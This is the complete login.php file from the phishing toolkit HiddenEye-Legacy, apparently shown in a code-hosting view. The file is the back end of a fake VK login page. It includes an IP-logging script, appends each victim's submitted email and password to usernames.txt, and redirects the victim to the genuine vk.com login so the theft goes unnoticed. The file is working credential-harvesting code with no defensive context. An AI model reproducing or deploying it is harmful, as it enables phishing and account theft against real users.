HiddenEye-Legacy/WebPages/VK/login.php

7 lines
193 B
PHP
Raw Normal View History

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://vk.com/login');
exit();